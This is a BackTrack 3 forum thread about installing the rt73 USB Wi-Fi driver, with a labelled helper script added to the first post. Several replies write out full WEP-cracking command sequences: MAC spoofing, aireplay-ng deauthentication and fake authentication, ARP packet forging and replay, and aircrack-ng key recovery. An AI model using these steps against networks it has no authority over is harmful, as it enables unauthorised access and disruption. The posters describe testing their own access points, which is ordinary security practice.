Poll: Did this work for you? (33 voters)

  • Yes: 23 (69.70%)
  • No: 10 (30.30%)

Thread: Getting the rt73 driver to work in BT3final

  1. #1
    Junior Member 0tt0v0nc4t's Avatar
    Join Date
    Mar 2008
    Posts
    69

    Default Getting the rt73 driver to work in BT3final

    BT3 final has a few minor issues with our driver that are fairly easy to circumvent and I wanted to share my solutions here. This is a collection of notes and ideas I have put together from my time here and first and foremost I want to thank the community because everything I'm putting here I found from various posts in these very forums.

    I would also like to ask you to please remember this is a howto for the RaLink RT73 USB Enhanced Driver. Please keep the discussion in this post relevant and don't ask for support for mundane BT3 tasks.

    Now let's begin. It's a good idea to grab a couple things before we get started. The first thing you need to do is get the BT3 kernel sources (thank you shamanvirtuel for delivering me from my noobedness)
    and after that you will need the previous version of the aspj driver. (SV yet again infinitely wise)

    After you have what you need and you are in BT you can bring down your current interface and driver with
    Code:
    ifconfig rausb0 down
    
    modprobe -r rt73
    Then you wanna navigate to your folder with the kernel.lzm and type
    Code:
    lzm2dir kernel.lzm /
    afterward you can go to the driver folder and
    Code:
    make
    
    make install
    now you can bring up the driver and interface with
    Code:
    modprobe rt73
    
    ifconfig rausb0 up
    At this point your wireless card is ready to be put to good use. Iwpriv commands and SpoonWep will now work gloriously! If you are looking to crack wep/wpa with our card use SpoonWep or look here for a tutorial on how to do it with the terminal, if you are looking to connect to a wep encrypted AP use wireless assistant, and if you are trying to connect to wpa/wpa2 use these commands.
    Code:
    ifconfig rausb0 up
    iwconfig rausb0 mode managed
    iwconfig rausb0 essid <Your SSID>
    iwpriv rausb0 set AuthMode=WPAPSK    # or WPA2PSK if you are using WPA2; WPA2PSK is for this line only
    iwpriv rausb0 set WPAPSK=<Your Key>
    iwpriv rausb0 set EncrypType=TKIP    # or AES
    dhcpcd rausb0
    This has worked very well for me and I hope it works for you too. Good luck.
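
Added example, not part of the original post or of the driver's own tooling: a POSIX shell helper that checks the WPA settings used in the command sequence above and prints the commands, with the SSID and key safely quoted, instead of running them. The function names and the sample values are hypothetical and constructed for illustration; the 8 to 63 character limit is the standard WPA passphrase rule.

```shell
#!/bin/sh
# Validate WPA settings for the rt73 iwpriv sequence and print the commands.
# rt73_wpa_plan and shquote are hypothetical helper names (not from the post).
# Note: iwpriv receives the key as an argument, so it can end up in shell
# history and in the process list while the command runs.

IFACE=rausb0   # interface name used throughout the thread

# Wrap a value in single quotes so spaces and shell metacharacters survive.
shquote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# usage: rt73_wpa_plan <ssid> <passphrase> [WPAPSK|WPA2PSK] [TKIP|AES]
rt73_wpa_plan() {
    ssid=$1 key=$2 auth=${3:-WPAPSK} enc=${4:-TKIP}

    case $auth in
        WPAPSK|WPA2PSK) ;;
        *) echo "unsupported AuthMode: $auth" >&2; return 2 ;;
    esac
    case $enc in
        TKIP|AES) ;;
        *) echo "unsupported EncrypType: $enc" >&2; return 2 ;;
    esac
    # An SSID is 1 to 32 characters long.
    [ "${#ssid}" -ge 1 ] && [ "${#ssid}" -le 32 ] || {
        echo "SSID must be 1-32 characters" >&2; return 2; }
    # A WPA/WPA2 passphrase is 8 to 63 characters long.
    [ "${#key}" -ge 8 ] && [ "${#key}" -le 63 ] || {
        echo "passphrase must be 8-63 characters" >&2; return 2; }

    # Same order as the commands in the post; nothing is executed here.
    cat <<EOF
ifconfig $IFACE up
iwconfig $IFACE mode managed
iwconfig $IFACE essid $(shquote "$ssid")
iwpriv $IFACE set AuthMode=$auth
iwpriv $IFACE set WPAPSK=$(shquote "$key")
iwpriv $IFACE set EncrypType=$enc
dhcpcd $IFACE
EOF
}

# Constructed sample values.
rt73_wpa_plan "example-ssid" "constructed-passphrase" WPA2PSK AES
```
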

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    5

    Default

    Quote Originally Posted by 0tt0v0nc4t View Post
    When Bt3 loads it recognizes that the rt73 driver is loaded and sees the rausb0 interface but will not pick up ap's in any program. The fix I have found is to simply

    Code:
    modprobe -r rt73
    modprobe rt73
    Or even better... Use SpoonDrv.
    Please, can you explain what SpoonDrv is? Is it better?

  3. #3
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    I too have the Edimax EW-7318USg and just like the OP said, it doesn't work out of the box. I also had to modprobe the adapter for it to work.

    It doesn't bother me now, but out of curiosity can any of the devs explain the reason why the card doesn't work for BT3 Final? It works on BT3beta out of the box.

  4. #4
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default Edimax EW-7318USg fails to inject

    My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it should work out of the box or try:-

    iwpriv rausb0 rfmontx 1
    iwpriv rausb0 forceprism 1
    iwconfig rausb0 mode monitor

    Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.

  5. #5
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by speed999 View Post
    My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it should work out of the box or try:-

    iwpriv rausb0 rfmontx 1
    iwpriv rausb0 forceprism 1
    iwconfig rausb0 mode monitor

    Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.
    Try this:

    Code:
    $ airmon-ng stop rausb0
    $ ifconfig rausb0 down
    $ macchanger --mac 00:11:22:33:44:55 rausb0
    $ airmon-ng start rausb0
    $ airodump-ng rausb0
    find the bssid
    copy the bssid
    $ airodump-ng -c 1 -w output --bssid <bssid> rausb0
    $ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
    $ aireplay-ng -0 5 -a <bssid> rausb0
    $ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
    answer yes and wait
    $ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
    $ aireplay-ng -2 -r arprequest rausb0
    say yes
    $ aircrack-ng output-01.cap

  6. #6
    Junior Member 0tt0v0nc4t's Avatar
    Join Date
    Mar 2008
    Posts
    69

    Default

    speed999, the aircrack wiki for our driver (found here) says to try
    Code:
    iwconfig rausb0 rate 1M
    good luck.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Quote Originally Posted by The_Denv View Post
    Try this:

    Code:
    $ airmon-ng stop rausb0
    $ ifconfig rausb0 down
    $ macchanger --mac 00:11:22:33:44:55 rausb0
    $ airmon-ng start rausb0
    $ airodump-ng rausb0
    find the bssid
    copy the bssid
    $ airodump-ng -c 1 -w output --bssid <bssid> rausb0
    $ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
    $ aireplay-ng -0 5 -a <bssid> rausb0
    $ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
    answer yes and wait
    $ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
    $ aireplay-ng -2 -r arprequest rausb0
    say yes
    $ aircrack-ng output-01.cap
    Tried this but 'aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0' fails after 'Sending Authentication Request' with 'Attack was unsuccessful'. This is the same problem I have when using:-

    airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

    aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

    aircrack-ng -b <bssid> capturefile*.ivs

    I only get to attempting the fake authentication and it fails! No problem with the same attack using BT2.

    Tried ‘iwconfig rausb0 rate 1M’

    The fake authentication worked but 'aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0' failed 'the access point does not properly discard frames with an invalid ICV.....'

    When I used:-

    airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

    aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

    Brilliant and thanks it works!

    As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

    Thanks again for everyone’s help

  8. #8
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by speed999 View Post
    <snip>
    When I used:-

    airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

    aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

    Brilliant and thanks it works!

    As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

    Thanks again for everyone’s help
    Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.

    Code:
    iwconfig rausb0 txpower 10
    Then increase it by 1dBi each time:
    Code:
    iwconfig rausb0 txpower 11
    Lucky for you anyway! All day I have been trying to inject my AP with my Edimax and I can't! LOL!
    It gets worse, Back|Track does recognize my card, but I tried a LOT of tricks and it was a hit and miss. It took me nearly 3 hours to connect to my AP as the card didn't see any AP's at all! Then when I set my card into monitor mode to test out the funny EzPWN toolset just for a laugh...it didn't see any APs!

    I exited EzPWN and loaded airodump-ng, it saw the APs. Then I stopped airodump-ng in order to define my AP in airodump and start injecting...nothing, it didn't even see any AP's. I can not connect to the internet on BackTrack unless I load it, restart it, load it and restart it again. It's very frustrating because it was working perfectly for a while and now I have to hold off my BASE/Snort/With_Graphs tutorial as I'm in Windows as it's the only way I can connect to my AP.

    In case anyone is wondering, yes I do have a built in Atheros but I am not in my computer room today and the ath0 is crap from my shed. Any help from anyone on this mysterious rt73 problem would be appreciated.

    Okay, I am still in Windows [only way to surf at the moment] and I found this on the Aircrack-ng site:
    The instructions below reference an older version of the drivers than is available on ASPj's site. This is because the newer version contains some bugs. See the forum threads for details.
    I am going to look into this as soon as I boot back into BT3f.

  9. #9
    Junior Member 0tt0v0nc4t's Avatar
    Join Date
    Mar 2008
    Posts
    69

    Default

    I am having strange issues with my card as well. Fortunately I have an intel pro wireless on a laptop so I have been using that to play around on.

    First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.

    Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
    My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.
    Code:
    ifconfig rausb0 up
    iwconfig rausb0 mode managed
    iwconfig rausb0 essid <Your SSID>
    iwpriv rausb0 set AuthMode=WPAPSK    # or WPA2PSK if you are using WPA2
    iwpriv rausb0 set WPAPSK=<Your Key>
    iwpriv rausb0 set EncrypType=TKIP    # or AES
    dhcpcd rausb0
    My next step is to try the previous aspj driver, drop my encryption to wep, and see if I can connect/scan/exploit ok.

    Please post your solutions Denv and I will post any I find as well. Thanks.

  10. #10
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by 0tt0v0nc4t View Post
    I am having strange issues with my card as well. Fortunately I have an intel pro wireless on a laptop so I have been using that to play around on.

    First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.

    Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
    My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.
    Code:
    ifconfig rausb0 up
    iwconfig rausb0 mode managed
    iwconfig rausb0 essid <Your SSID>
    iwpriv rausb0 set AuthMode=WPAPSK    # or WPA2PSK if you are using WPA2
    iwpriv rausb0 set WPAPSK=<Your Key>
    iwpriv rausb0 set EncrypType=TKIP    # or AES
    dhcpcd rausb0
    My next step is to try the previous aspj driver, drop my encryption to wep, and see if I can connect/scan/exploit ok.

    Please post your solutions Denv and I will post any I find as well. Thanks.
    I will do, no sweat man. I'm on Windows at the moment using my Atheros card, it's nearly 5am and I have been awake for more or less 2 days trying to get BASE working. Not a problem, tomorrow I will troubleshoot my Edimax and post my results here. I also have zero success with Wireless Assistant and SpoonWep, of course CL was my first approach and it 'half' worked and hasn't worked since.
